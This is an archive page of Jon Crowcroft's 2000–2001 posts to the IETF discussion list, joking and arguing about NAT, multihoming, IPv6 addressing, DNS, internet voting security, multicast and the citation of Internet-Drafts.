2001-02-22 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Harald Alvestrand typ
ed:

no no no - like ascii, pencil and surface is re-usable, both for
revised drafts, and for keeping warm if the minneapolis weather should
change too quickly

stone is ok, but only for full standards and bcp


 At 15:23 22/02/2001 +, Jon Crowcroft wrote:
 i) the americans spent a lot of money on spaceworthy pens,
 but the russians showed that PENCILS are fine
 
 ii) paper burns at farenheit 451 (ref: burroughs, '63, truffaut '68],
 this many IETF meetings generate enough heat to ignite any draft being
 discussed if presented in this format
 
 so we need to use pencil and (unprocessed) wood
 
 have away with all these incendiary materials!
 
 bring a stone tablet and a chisel!
 
 --
 Harald Tveit Alvestrand, [EMAIL PROTECTED]
 +47 41 44 29 94
 Personal email: [EMAIL PROTECTED]
 

 cheers

   jon




Re: was Why we shouldn' use ASCII text (now censorship)

2001-02-22 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Jon Crowcroft typed:

 ii) paper burns at farenheit 451 (ref: burroughs, '63, truffaut '68], 

people pointed out (correctly) that the right reference here is
bradbury (ray, of light, not malcolm, of history) and not
burroughs (not Edgar (of detective story prize) Rice (paper) Burroughs, 
nor William (soft machine, near hourston?) Burroughs, nor even the 
Burroughs (yes, related) of computing famemea culpa

of course it was truffaut (francois, claire's knee etc) who made the
excellent movie


on another topic, we noticed that we cannot see certain sites that
provide some interesgint IP anonymizing services -we ran a 
traceroute -p xyzd to them and discovered that some hi-level ISPs are
running some port filtering - interesting - should one peer with
such folks given its hard to route around them as an end user?

 cheers

   jon
putting out the fire with gasoline...




Re: what is NAT Good For ...

2001-02-14 Thread Jon Crowcroft


of course if NAT is so cool, 
why not make _every_ hop do NAT (Naughty Awful Terrible stuff)
instead of MPLS (My Protocol's a Lot Slower)
as a way of aggregate traffic engineering without recourse to 
level 2 (which we all know is making a lot less money than level 3
right now)

i mean they are both label swapping schemes right, so if mpls is so
cool, but NAT is the IP-holic approach, it ought to be fine, eh?

 cheers

   jon




Re: An alternative to TCP (part 1)

2001-02-06 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Keith Moore typed:

 I don't agree that abundant IPv6 addresses remove the need for something
 akin to a port number.   They might remove the need for transport-level
 multiplexing, but only if any host could allocate a sufficiently large
 subnet, and it's not clear that this will be the case.  However port
 numbers are also used to form names of connection endpoints, and we have
 some need for well-known endpoint names to reach standard services. 

this is debateable - if we used GSE/8+8, then the route glop could get
you somewhere and the site glop to a machine ,and chaning EID is not
such a crazy idea at all - there have been protocol stacks like this
and there are certain privacy and other security advtangaes (it was
used in a secure ATM proposal i seem to recall fro mcambridge
university computer lab about 7 years ago...)

cheers

   jon




Re: NAT isn't a firewall Re: harbinger, Re: [midcom] WG scope/deliverables

2001-02-04 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Scott Brim type
d:
 Although address obfuscation through combining NAT with your firewall
 can provide a small amount of additional security.
 

against which attacks ? it doesnt provide better privacy, or non
repudation, or access control, or any normal service that one would
regard as an enhancement of security - in fact, having one address
shared by multiple host s means there are less things an attacker
needs to remember :-)


 cheers

   jon




Re: [midcom] WG scope/deliverables

2001-01-31 Thread Jon Crowcroft


In message [EMAIL PROTECTED], "J. Noel Chiappa" typed:

 Keith, why don't you start an NAT-Haters mailing list, and take all this
 disgust with NAT's there? (I'm quite serious about this.)
 
 You seem to be having problems accepting that fact that NAT's are selling
 several orders of magnitudes (I'd guess at least 3, but it's probably more)
 more units than your preferred alternative. Most people would regard this as
 a sign that the world has decided, and move on.

many nats cost nothin - many are check boxes on existing products -
alternatives cost money - some day tho, they may be required like IP
was when we started with x.25:-)

 When life gives you lemons, you have to make lemonade. NAT's are a fact of
 life, and we will, indeed, have to find some way of incorporating them into
 the mainstream architecture of the Internet. This is a subject on which I have
 pondered a lot, for several years - maybe you should wrestle with it too.

when life gives you lemons, pick grapes instead and make wine
or bottle spring water and sell that (with or without added CO2)
its better for your teeth.



 cheers

   jon




Re: solution to NAT and multihoming

2001-01-26 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Jon Crowcroft typed:

 if multihoming is killing routing coz default free zone routers have
 too many entries
 and NAT is killing users coz they can't get always on addresses
 why not have multihomed sites (aren't they usually server/core
 provider sites) LEASE their standby link address prefixes to access provider
 sites - and swap the address prefixes when their default link fails
 and they need to failover to the standby link/addresses...
 
 symmetry dictates this ought to work out...and everyone wins

 by setting uo as a market we could even make the incentives right...

i wasn't too clear about this (a bit like my lousy 1000 bit error in
the port nat message - that'll teach me to send emails before i've had
any coffee:-)


so after suitable basting by sean doran, here's the scoop:-

I like GSE; however we dont have v6 and we do have NATs; we also have
multihoming.

1/ consider global DHCP as a tool, and a mechanism for buying a
lease on an aggregate

2/ do NATting on aggregates

3/ design a BGP attribute (yech, i know) to inidcate that an address
range is "bank switchable" - this means that it is part of a lease
from one AS to another. This means that when told (via management, BGP
update, or designated "important" ingress or egress link failure), a
pair of domains then bank switch the address range, but enable NATing
on the range for exsting flows...

got it?

j.




Re: Number of Firewall/NAT Users

2001-01-23 Thread Jon Crowcroft


o'dell's GSE draft addressed renumbering perfectly.

In message 5.0.2.1.2.20010123015631.02bbba30@localhost, "David R. Conrad" typ
ed:

 Kyle,
 
 At 03:53 AM 1/23/2001 -0500, Kyle Lussier wrote:
 It is a horried idea to start setting up NATs on cell phones,
 
 Hmm.  We should probably tell that to the existing 17+ million users of 
 i-Mode in Japan.  Better hurry as i-Mode is moving into Europe.
 
 (I liked the ip addressible coffee machine I saw that you could
 telnet into).  Do you really want to put and configure a NAT in
 your coffee maker?
 
 I would imagine that you'd have a household gateway/NAT, not a NAT on every 
 device in your household (and I'd argue if you have to configure anything 
 network related on your coffee maker other than perhaps its name, something 
 is seriously wrong).
 
 As the pain of limited IP address space tightens we'll move more
 and more to IPv6 and it'll level itself out.
 
 IPv6 is not a magic wand.  Because v6 uses provider based addressing, 
 non-transit providers will still need to renumber in v6 as they do in 
 v4.  Renumbering can be expensive.  NATs are seen by many enterprises as a 
 way of removing the need to renumber should they change providers.  Until 
 the issue of renumbering is addressed, NATs will not go away.
 
 Rgds,
 -drc
 

 cheers

   jon




Re: Number of Firewall/NAT Users

2001-01-22 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Keith Moore typed:

  The IETF has done it's job with 6to4, but like you said we can't force
  people to deploy it. But let's stop and think about 6to4. Aren't some of
  the same "tricks" or ALG's that are planned to make applications work 
  with IPv4 NAT, applicable to 6to4? If so, then we must find solutions 
  now since 6to4 could be with us for many years.

 Given that the whole point of 6to4 is to allow IPv6 packets to be
 passed end-to-end without modification, I don't see how ALGs apply at 
 all. NAT-PT of course has similar issues to v4 NAT, but NAT-PT and
 6to4 are different things.

Keith


2 ways forward are 

1/ what you propose - provide clean, alternate
complete solutions for today's ISPs - 6to4 is only part of a big
system deployment-  it would be nice to come up with smaller stageing
posts along the waysomething i've wondered about:

NAT is predicated at least partly on the observation that a lot of 
internet users don't appear to need to be "always on" 
(i.e. like temporal locality
(not spatial locality) of telephone nets,
there's a distribution of use and it means that we can get away with
far less address allocated than users.

  I would suggest that if an ISP asks for address space based on a
number of users but then uses NATs they are misrepresenting the
number of users and should be given less address space:-)
(i think this is doubly fair since they make less use of addreses, AND
less applications are able to run to and from their users)

2/ make a clear business for ISPs to offer NAT free access as a
competetive advantage

3/ here's a silly idea - take some of the address space and make it
client only. (i.e declare half the remaining address space to be
assymetric - truth in advertising...
since there's then no servers, you can use port expanders on the low
1024 bits of the tcp or udp port to get more addresses(yes, port
nats, but as part of the official address allocation plan...)

 cheers

   jon




Re: internet voting -- ICANN, SmartInitiatives, etc.

2001-01-14 Thread Jon Crowcroft


the bggest problems with security ssytems are generally 90% to do with
design errors at level 10 (human, not policitcal, economic,
application, transport etc)

it would be interestign to run a _real_ experiment in 3 types of
voting (comuter based, networked computer based and traiditional) and
see if the results came out the same - it should persist for several
decades before one could believe that any adaption in the
democratic process hd factored in human behavioural bias  imho

In message [EMAIL PROTECTED], Ed Gerck typed:

 
 
 Kai Henningsen wrote:
 
  [EMAIL PROTECTED] (Ed Gerck)  wrote on 12.01.01 in [EMAIL PROTECTED]:
 
   No. Digital signatures such as X.509/PKIX do violate voter privacy, but
   never ballot secrecy.
  
   In all fairness to you, maybe there is a confusion with the word "privacy".
   In this case, maybe you write "secrecy" above but you mean "privacy". BIG
   DIFFERENCE, though.
 
  Indeed. The way you have it defined, both are one half of what must be
  achieved (impossible to identify voters, and impossible to identify
  votes), with both halves completely meaningless in isolation (which is why
  a traditional paper vote does achieve the combination, but neither half in
  isolation). Whereas the way most people define this, the two terms are two
  names for the same thing, which is the whole (it must be impossible to
  determine who voted what). The correlation is the problem, not the
  isolated facts.
 
  There is more obfuscation like that in your "16 requirements". Not what
  I'd consider a recommendation.
 
 Unless we define and isolate the concepts used, it is nearly impossible to 
 meaningfully
 deal with them. This is basic scientific method.  Thus, making a clear distinction
 between "secrecy" and "privacy", as well as between "identification" and
 "authentication" and "non-repudiation" is at the heart of the matter here. Doing
 otherwise is obfuscation -- "to make obscure."
 
   Safevote's open attack test described at www.safevote.com/tech.htm showed
   that the following attacks were 100% forestalled during the entire test for
   24 hours a day in 5 days: (1) Denial-of-Service; (2)  Large Packet Ping; (3)
   Buffer Overrun; (4) TCP SYN Flood; (5) IP Spoofing; (6) TCP Sequence Number;
   (7) IP Fragmentation; (8) Network Penetration; and other network-based
   attacks.
 
  Grand. It withstood network level attacks. That's about the most
  meaningless test possible - all it proves is the quality of the TCP stack,
  it tells absolutely bloody nothing about the voting system itself.
 
 Forestalling  Denial-of-Service attacks was unheard of and called "impossible"
 in Internet voting until we showed how it could be done in one specific network
 configuration useful for elections in precincts.  There are other configurations
 where it can be done as well, as we shall show in the future.  This was one
 Holy Grail in Internet elections, and we got it.
 
 The same applies to other 7 attack types mentioned -- so this was no easy feat
 for 5 days, 24 hours/day attacks, with full disclosure and a help line.
 
 Conclusion of the test: "Internet" does not mean "insecurity".  Just because
 it uses the Internet it does not mean it MUST be insecure.  Contrary to lore,
 Internet communications can be made arbitrarily safe and reliable
 (Shannon) if you take into account all the systems connected to it.
 
 The first step is to recognize that any communication channel has a boundary,
 which is quite arbitrary. By properly recognizing the sub-communication channels
 inside a boundary and by properly placing such boundaries, the point I make is
 that it is possible to have the communication system (roughly):
 
 registration -- voter -- ballot box --  tally -- report
 
 as error-free, anonymous and secret as anyone else may wish (Shannon).
 Here, the systems connected to an Internet-base channel are not ignored.
 They are taken into account and with adequate error-correction channel(s)
 (Shannon).
 
 Again, this is a lot easier in the praxis for precinct-based Internet voting.
 Which is all we are talking about at this time.  Home/office-based Internet
 voting is IMO too political to be meaningfully discussed at this time. Even
 though we do have the technological answer for remote voting as well, we
 would lose too much time in discussing it now.  Rather, we prefer to focus on
 precinct-based solutions, at a fraction of the price of DREs (electronic
 voting) and with better assurances.
 
 Cheers,
 
 Ed Gerck
 

 cheers

   jon




Re: IP course project

2001-01-12 Thread Jon Crowcroft


In message [EMAIL PROTECTED], 
Vijay Ramachandran Iyer typed:

  I am a Masters' student at NCSU in Computer Networking. Recently
 registered at the ietf.org site. I am toying with the idea for a project
 in VoIP or Mobile IP for my IP class. What are the relevant RFC's should I
 be looking for?

an ericsson or nokia gsm phone works quite well
for mobile vice in most the world apart from major some
US cities:-)

IP is not required.
 
  Also, experienced professionals, could you please let me know the kind of
 equipment needed to work in these areas?
 
if you insit on running 2 time worse than toll quality speach, then
i sponse the front runner for IP voce in products (that have cross
"platofmr" support) is an H.263 and netmeeting type product

look for rfcs with the word "experimental"


we tried...the business case for real time is not good in networks
that make money out of being shared when there are already realtime
networksd (for tv, raio and telephony) out there

otherwise there is a new book by fred halsall on intenet multimedia
which i thoguht was very good...

 
 Vijay Iyer
 
 Teaching Assistant
 CSC Department
 NCSU
 Raleigh
 ***
 You should become what you want to see
-- Mahatma Gandhi
 ***
 

 cheers

   jon




Re: Eliminating Virus Spam

2001-01-04 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Francis D
upont typed:

 Vernon, I fully agree with you: there is no reason to get multipart
 messages in technical discussion mailing lists. Even if your solution
 seems drastic this is the way we should go.
 
i'd prefer to see us develop a more 21st century solution 

first, we should register mime types that we DO allow on a list

second, if someone must send an executable attachment , then we have a
signing server that signs the attachment as trustworthy - most of the
stupid atachments come from places who wouldnt be part of my trust
chain.

 cheers

   jon




Re: Technical Internet Advancements for White House Internet Strategies

2001-01-04 Thread Jon Crowcroft


some of the folks on this list aren't american or US citezens and
might think that this is a bit presumptious.but here goes:-

the first thing the white house should do is educate its customers and
organise voting properly

the next thing it should do is apply for membership of the European
Union

following that, the use of other languages might be a considerably
benefit - e.g. spanish, chinese and hopi spring to mind

finally, what fee is being paid for this, and in what (stable)
currency, and under which tax treaty?


:-)

In message [EMAIL PROTECTED], Steven Clift typed
:

 I am looking for a few leading Internet technical experts to contribute 
 their ideas for an online conference on the *use* of the Internet by the 
 next White House.  What advancing Internet standards and tools should be 
 considered?  What would you do if you were in charge?  What could the White 
 House do to filter and respond to the millions of e-mails it receives in a 
 more effective manner?  How might syndication and XML strategies be employed?
 
 If you'd like to contribute a short essay to the event as described below, 
 please drop me a note [EMAIL PROTECTED] with your suggested topic area.  - 
 Steven Clift
 
 -
   Democracies Online - White House 2001 Online Conference
Envisioning the Next White House Web Site
 -
 
 Opens with 100 Participants
 
 An online event through January 18, 2001 to generate ideas and exchange 
 information on the next White House web site.  What should the next White 
 House Web site do?  What should it look like?  How should the White House 
 use online communications strategically to connect with citizens and govern?
 
 How this facilitated and moderated online exchange will work:
 
 1. Idea Bullets - Each participant is encouraged to share one short idea 
 for the next White House web site.
 
 2. Strategic Essays - Internet leaders and netizens are asked to contribute 
 short 400-500 word essays covering a specific Internet *use* strategy the 
 White House should consider. Big ideas and solid advice wanted! These 
 essays should be submitted to the online event facilitator, Steven Clift 
 [EMAIL PROTECTED] for review.
 
 3. General Comments - All participants are encouraged to comment and add to 
 the ideas sent to the forum. All posts will be moderated with a general 
 limit of one or two posts per day per person. To keep message volume in 
 check, some messages may be held one or two days.
 
 To JOIN the online conference, simply send an e-mail to:
   [EMAIL PROTECTED]
 
 To messages via the web or choose digest options visit:
   http://www.egroups.com/group/do-whitehouse
 
 To join the 1600 member Democracies Online Newswire moderated announcement 
 e-mail list, get the full details at: http://www.e-democracy.org/do
 
 This is a strictly unofficial activity. Content from the online event will 
 be made available to White House officials and the public.
 
 Hosted by Steven Clift http://publicus.net with the Democracies Online 
 Newswire
 http://e-democracy.org/do. If your organization would like to Co-Sponsor 
 this event, all you need to do is bring 20 verified participants to the 
 forum or send information about the forum to at least 1000 people on an 
 e-mail list run by your  organization. Contact [EMAIL PROTECTED] to 
 co-sponsor this event.
 

 cheers

   jon




Re: NATs *ARE* evil^H^H^H^Hmpls!

2000-12-20 Thread Jon Crowcroft



one of nature's great dualities: statedulness will take root in the
most barren soil, even though datagrams will try to route around it

j

though if nat speak unto nat, then ipv6 be born




Re: NATs *ARE* evil!

2000-12-17 Thread Jon Crowcroft


 I understand that there are pressures to do multihoming, but I just don't see
 how NAT (i.e. address sharing) is having much effect one way or the other on
 the intensity of the pressure to do multi-homing.

NATs allow users to be irresponsible about the addressing since they
dont require you to multihome hosts, but dynamically pick which way to
enter and leave your domain - this means people can be stupid and run
multihomed. for example.

incentives are important wen resources are scarce y'know:-)

anyhow, i think the old 8+8 v6 scheme would have sorted this out just
dandilyand i dont understand the vitriol people our on it -
antyhing else (liek yo usuggest coordinaging the addresses allocated
to NATs on the outside so they aggregate ) is the SAME thing. involves
the same requirements for a protocol to coordinate it

nats for securtyy thru obscrurity are about as relavent to real
security failures and risk and loss of face and revenue as postits on
your keyboard saying do not touch...the most common failure we get is
via applicatio nlevel messes (e.g. mail attachements) and user
education is the only way to solve those. 

but of course, with pip

 cheers

   jon




Re: NATs *ARE* evil!

2000-12-14 Thread Jon Crowcroft


 Sean,


there were several interesting talks in the ietf plenary last night and 
i'd also like to respond

1/ randy's "woah, the DNS is bust" talk
solution - put your named boot file on your web server and set
up robots.txt right

get the 15 or so most popular search engines to start pulling it

add an option to name resolution libraries to use http and
google/altavista/bla blah to lookup name/address bindings

(i.e. replace lookup with search and update with web crawl - you can
also make your dns update hapen faster by articficially hyping the
searches - yo ucan even include advertisements in the responses)

positive points
i) there are too many levels in the DNS server hierartchy - the name
hierarchy is important, but there is no reaso nto have multiple levels
in the server hierarchy - once upoj a time it was needed for some
scaling (localisation) of traffic - dns traffic is irrelvant compared with
web, so there's no problem doing it with 2 levels local/global - also,
the caching isnt working (as per randy and christian huitema's work)
anyhow so the localisdtion effects  merely add latency to lookups i
nthe current system

ii) there's lots of differt code for differ nt search enginees
this means we have a decent gene pool size compared with the DNS
server space where there's a good chance that like BGP, we are dead in
the water come the first new disease that we have no immunity too...

2/ NATs - 
i thought the comment was that there are too may ways of architecting NATs
which made it expensivce to buy one coz most the NAT box builders are
busy implementing all the varireities which makes them complex instead
of simple - two solutions
i) no ietf standards effort should continue after we have 3 approaches
to a problem - given NAT, IP tunnels and mpls have about 7, 14 and 143
different approaches, this is evidentially a good heuristic for
pruning pointless ietf wgs - of course those mpls watchers amongst us
may have noticed that this is happening there
(note this doesn't invalidate my approach to fixing name serving about
since that is a single architecture buyt with lots of differnt
detaield implemtnation approaches)

3/ internationalisation - 
its clear that we are making great progress - the gentleman from the
ITU made it clear  in his speaking that are much better at
understanding christian huitema which is a great breakthrough...

4/ those of you who saw geoff huston's excellent 
"the bgp is hosed" talk at the routing area meeting, and its excerpted
comments in the plenary should be very afraid - i did a search on a
citation database on routing research - not to see what work has been
done recently on ways to solve inter-domain scaling, convergence and
correctness problems (though craig labovitz work is distinguised there
by both its quality, and its loneliness!), but also to see if there
was any indication that there was research in universities and
research labs that  was runnign at a level that might indicate clueful
people coming out of their grad schools ready to solve our problems -
there isnt. the research funding agents should be blamed for this:-)
(note that i am not talking about graph theoertizcians - more the
mit/berkeley/usc type research work that is done in a real world
context)

note that a major problem with the little wortk that is done is that
its not often done in realistic topologies - this is a problem with
ISPs who wont let people get at the data (or the traffic traces) so
with a few honourable exceptions, most the smart people trying to do
new stuff go on to other areas where there aren;t intractable barriers
to doig the experimental verficaition of the idea (e.g. transport:-)

 cheers

   jon

p.s. pierro de la francesca or vermeer make better gurus, but if you
want to read about routing and addressing and what we ccould have done
for ipng, i like paul francis' phd work:
(linked from
http://www.cs.ucl.ac.uk/staff/jon/paststudents.html
so you can see my bias:-)
it elegantly included some ideas from nimrod, but had some pragmatic
implementation decisions whioch made it fast and simple and flexible -
it emerged as pip, but was about 95% pruned out in the final v6
decisions...




Re: NATs *ARE* evil!

2000-12-14 Thread Jon Crowcroft


i can just see it when the aliens land and  ask how to connect to our
infrastructure, we'll have to say

oh we used to have an internet, but it 
lost something in the translation

j.




Re: 49th-IETF conf room planning

2000-12-13 Thread Jon Crowcroft


its appropriate that the 51st ietf is gonna be in the '51st state" -
we've been playing with market forces for 23 years (18 years of
margaret thatcher then john major, then tony blair) - solutons in
london will involve vickrey auctions for the seats - themoney will be
used to pay for upgrading the railway track from heathrow airport to
the ietf venue tp make sure people dont miss more than a day of the
fest

 cheers

   jon
p.s. congrats to bush - i am glad to see that the law of succession is
being restored in the US after many ears ofrejection of uk rule




Re: How many cooks?

2000-12-04 Thread Jon Crowcroft


 At least the drafts coming into the IETF don't show the
 same behavior as scientific papers, which is that title
 length directly correlates with the number of authors.
 


perhaps we shpould encourage i-ds (and rfcs) to have authors from as
many countries as possible so that they can be simultaneously
translated into as many local languages as possible (and zip coded for
the hard of thinking:-)

 cheers

   jon




Re: More on bake-offs and trademarks

2000-11-07 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Henning Schulzrinne typed:

 "Just because you're paranoid doesn't mean they are not after you... "
 Apparently, Pillsbury is on a bigger crusade, as the editorial change at
 http://cacheoff.ircache.net/ is indeed due to lawyer pressure, based on
 reports from the owners of the site.
 

an earliesh ref is below.

if (as i assume) they are referrng to 19th century pie competitions
between people at county fairs, i think they have a problem coz that
means its a word in common use and not a trademark

 cheers

   jon
-

11-Feb-88 18:46:52-PST,1331;M
Received: from UDEL.EDU by SRI-NIC.ARPA with TCP; Thu 11 Feb 88
18:40:35-PSTM
Received: from huey.udel.edu by Louie.UDEL.EDU id aa04152; 11 Feb 88
21:35 ESTM
Date: Thu, 11 Feb 88 21:33:49 ESTM
From: [EMAIL PROTECTED]
To:   Hal Peterson [EMAIL PROTECTED]M
cc:   [EMAIL PROTECTED], [EMAIL PROTECTED], M
  [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED]
Subject:  Re:  Life in the Swamps / TestingM
Message-ID:  [EMAIL PROTECTED]M
M
Hal,M
M
Once upon a time Vint Cerf was keeper of the alligators and even Bob
BradenM
collected a few. I've got a backyard full of the critters myself.
However,M
the point of my remark was that we don't need to invent bizarre test
suites,M
just how well it works in the current environment. What may be more
usefulM
for you would be to find out what the current environment really is
(lossM
rates, mangle angles, quench characteristiccs, etc., then build a
flakewayM
(broken network simulator) with similar characteristics and do war
with it.M
That's in fact how we did the initial IP testing (with credit to Bob
Braden)M
in the bakeoffs of antiquity.M
M
I'll rephrase my homily: We have met the enemy and he is us. Now you
mayM
understand my preocupation with swamps. Pass the stogies, Albert.M
M
DaveM




Re: Usable Video from Meetings (was Re: Suggestion)

2000-10-20 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Harald Alvestrand typ
ed:
 MBONE tunnels to connect, and a widely available (Linux?) client that would 
 connect to that server, and behave like a multicast router?
 
 "start this program on a spare PC, and you too can watch the IETF multicast".

we have reflectors - what we don't have is what we talked about ever
since 1989, which is remote control of a reflectorcu-seeme has
some stuff, but we never generalized it 

actually , the reason for not allowing auto-setup of a reflector is
the EXACT same reason ISPs dont allow IGMP at the edge  is you get to
get unexpected traffic patterns on your net - normally, a sender can
only send at the rate their access link providers to someone who can
receive at simial rate (basically TCP...) a multicast can send at a
rate 1 receiver can handle, but other receivers joing the multicast
can cause traffic to clobber downstream links so we've been working
for ages to try to devise 
i) adaptive audio/video schemes in avt
ii) tools that tell receivers that they might as well leave a session
in the mmusic wg (e.g. RTP monitoring )
iii) rmt wg protocols that do TCP like congestion control
(e.g. rlc and pgmcc schemes)
etc etc and more flexible models for multicast access (igmpv3)
and routing (ssm etc) to permit ISPs to manage traffic in as similar ways
as they are used to for unicast as possible...

reflectors don't sidestep any of these problems - like NATs and other
intermediaries, appplication level stuff merely introduces another
layer to manage - soem reflectors do transcode data  - these seem
useful - some folks have designed application level multicast boxes
that also do things like access control, content and delivery based
billing, and also use IP multicast where available - all reasonable,
of course, and all part of the Content Distribution Net evolution

 I've been frustrated by the need to modify core routers to support 
 multicast properly, and the resulting reluctance of the ISPs to deploy it.
 Perhaps it's time to interpret this as damage, and route around it?

most core/tier-1 ISPs have multicast within the core...they just don't
have general access to it yet..the reasons are partly given above

its gonna change slowly...

actually, a servlet thing for a webcast/multicast/proxy (e.g. on
apache) would be v. coolmaybe we could even support gatewaysing to
netmeeting:-)

 cheers

   jon




Re: Suggestion

2000-10-19 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Telecom Regulato
ry Commission of Sri Lanka typed:

 Why cannot IETF arrange Netmeeting sessions. So that all new techniques 
 such as Video, Audio, White board, Chat etc. can be used to exchange the
 valuable knowledge members posses.
 
we do - we not only have put ietf WGs email in the public and archives
on the net and all docs on the web, but IETF meetings have some of the
main WGs live multicast out on the net

we don't use netmeeetign per se, coz its a specific technology, and
prefer to use somethign where the toolset is multiplatform and widely
avaialble - its done somewhat on a volunteer basis, so  depends also
on what the volunteers are interested in and expert at

it would be nice to
a) expand this
b) offer other formats (webcasting and netmeeting gateways)...

its up to you (i.e. anyone) to offer to do it as far as I am aware!

 cheers

   jon




Re: An Internet Draft as reference material

2000-09-24 Thread Jon Crowcroft



anyone with a worthy i-d which is not gonna make it as an RFC could do
worse than consider submiting it to INETa lot of the papers there
are in that line and would then count as prior art, be archival, and
citable.

possible source of pressure/problem:
interestingly enough, in tenure, most universities in the US 
to my knowledge (on
checking recently) don't admit of RFCs at all as part of the
publiations list in a CV...this may be good in some senses, as it
stops researchers trying to use the IETF as a place to get visibility
for tenures sake alone (but shouldnt put them off if they have
geneuine working code and think they;ll get consensus roughly:-)

escape valve::
so if i have a recommendation for folsk with well worked out i-ds,
its "find a good workshop - e.g. ieee sponsored, but also isoc or acm
or other and send it there" - alternatives too are some of the
magazines and newsletters  e.g. IEEE Network (publishes the most cited
work on RSVP for example) and ACM CCR (publishes a lot of inciteful
work on protocol implementation and experience...)

j.




Re: An Internet Draft as reference material

2000-09-20 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Magnus Danielson typed:

 For most of the time it is just plain stupid, however, there are material wich
 is published in ID form but later down the line is being dropped but still form
 the fundament for design decissions made in IDs making it all the way to RFC.

very good point - one of the marvellus thing about the older RFCs is
that they typically DO still inlude the discussio nthat led to the
design choices expressed - in recent years, we have tended to move
more towards the ieee/itu/iso in anonymising work, and in removing discussion
of the alternates and reasons  for not using them from final versions
of RFCs...this is a big mistake.

 Now, if you are going to write a book and want to discuss this backdrop and
 give a fuller picture then you will have to refer to these IDs. This is really
 a problem which the IETF has aswell, since this material is not available it is
 not as easy for a newcommer to get the full picture as those involved in the
 process has. For instance IPv6 has this problem. When you are in the process,
 you should feel that it is the Right Thing to drop this old material, but the
 question is if it is really the Right Thing in the long run. Some of these IDs
 should really be considered as being published as Informational RFCs for the
 purpose of giving the background material.

agree completely
 
  I'm not sure of the next case. Any body observed this?
  3. An RFC refers to an Internet Draft.
  
  Never (except as "work in progress", as noted above - and then the draft is 
  not mentioned by filename).

 This is a case where having this old background material could be valuble to
 have.
 
 Note, certainly will not all IDs be of interest, but some of them do represent
 knowledge which should be considered worthy of keeping.
 
 IMHO this is a problem, but it is not apparent for everyone being "in" the
 process, but some is aware of this...
 


of course, just coz a book is printed doesnt mean it can't be
obsoleted too (c.f. the old testament :-) arggg, no.i mean 
2nd editions can fix typos in earlier ones is all, not darwin versus
creation

 cheers

   jon




Re: Quality task force on web sites

2000-09-07 Thread Jon Crowcroft


In message [EMAIL PROTECTED], [EMAIL PROTECTED] t
yped:

 Quality of Service or Content?? 
 
 Easy answer:Quality of Service.  


well, the first thing you need before quality of service is
e-quality of service (TM)

i.e. you need a definition of fairness (max min, or proportional)

then you need _quantity of service_

then you can apply the work below to map from subjective requirements
to objective ones, and still deal with the financial aspects in a
transparent manner...(as well as doing some fancy marketing)

there was aVERY good tutorial on this at SIGCOMM this year...

 Quality of Content should be left to 'the Law of Natural Selection' and the First 
 Amendment Rights of the US Constitution (Freedom of Speech), which is the least 
 expensive and the long term good solution.
 
 
 
 On Wed, 06 September 2000, Jon Crowcroft wrote:
 
  
  
  In message [EMAIL PROTECTED], Maha
  devan Iyer typed:
  
   
   
   On Tue, 5 Sep 2000, Barathy, RamaSubramaniam wrote:
   
Hello Everybody,

Would it not be nice to have some sort of quality control task force that
assigns a quality level for the web sites through out the world. 

This would make the site developers to bring in the higher quality to the
net.
This could be used as an additional criteria in the search engines.
This could make higher quality sites to be a revenue generator.


With more and more web sites, we r getting lost in finding quality
information.
   
   
   
   What quality of a web site are you referring to?
   Quality of service or Quality of Content?  The latter is subjective.
   
  so is the former.
  
  see 
  G. M. Wilson and M. A. Sasse (forthcoming): Investigating the Impact
  of Audio Degradations on Users: Subjective vs. Objective
  Assessment Methods. To be presented as a full paper at OZCHI'2000,
  Sydney, Dec. 2000. 
  
  A. Watson  M. A. Sasse (forthcoming): The Good, the Bad, and the
  Muffled: The Impact of Different Degradations on Internet
  Speech. To be presented as a full paper at ACM Multimedia, Los
  Angeles, Oct. 30- Nov. 3. 
  
  G. Wilson  M. A. Sasse (forthcoming): Do Users Always Know What's
  Good For Them? Utilising Physiological Responses to
  Assess Media Quality. To be presented as a full paper at HCI 2000,
  September 5th - 8th, Sunderland, UK. Proceedings published
  by Springer. 
  
  A. Bouch, M. A. Sasse  H. DeMeer (2000): Of Packets and People: A
  User-Centred Approach to Quality of Service. Proceedings
  of IWQoS 2000, Pittsburgh, PA, June 5-8, pp. 189-197. 
  
  A. Bouch and M. A. Sasse (2000): The case for predictable media
  quality in networked multimedia applications. Proceedings of the
  ACM/SPIE Multimedia Computing and Networking (MMCN'00), 25-27th
  January 2000, San Jose, USA. 
  
  etc etc etc
  
   cheers
  
 jon
 
 

 cheers

   jon




Re: Quality task force on web sites

2000-09-06 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Maha
devan Iyer typed:

 
 
 On Tue, 5 Sep 2000, Barathy, RamaSubramaniam wrote:
 
  Hello Everybody,
  
  Would it not be nice to have some sort of quality control task force that
  assigns a quality level for the web sites through out the world. 
  
  This would make the site developers to bring in the higher quality to the
  net.
  This could be used as an additional criteria in the search engines.
  This could make higher quality sites to be a revenue generator.
  
  
  With more and more web sites, we r getting lost in finding quality
  information.
 
 
 
 What quality of a web site are you referring to?
 Quality of service or Quality of Content?  The latter is subjective.
 
so is the former.

see 
G. M. Wilson and M. A. Sasse (forthcoming): Investigating the Impact
of Audio Degradations on Users: Subjective vs. Objective
Assessment Methods. To be presented as a full paper at OZCHI'2000,
Sydney, Dec. 2000. 

A. Watson  M. A. Sasse (forthcoming): The Good, the Bad, and the
Muffled: The Impact of Different Degradations on Internet
Speech. To be presented as a full paper at ACM Multimedia, Los
Angeles, Oct. 30- Nov. 3. 

G. Wilson  M. A. Sasse (forthcoming): Do Users Always Know What's
Good For Them? Utilising Physiological Responses to
Assess Media Quality. To be presented as a full paper at HCI 2000,
September 5th - 8th, Sunderland, UK. Proceedings published
by Springer. 

A. Bouch, M. A. Sasse  H. DeMeer (2000): Of Packets and People: A
User-Centred Approach to Quality of Service. Proceedings
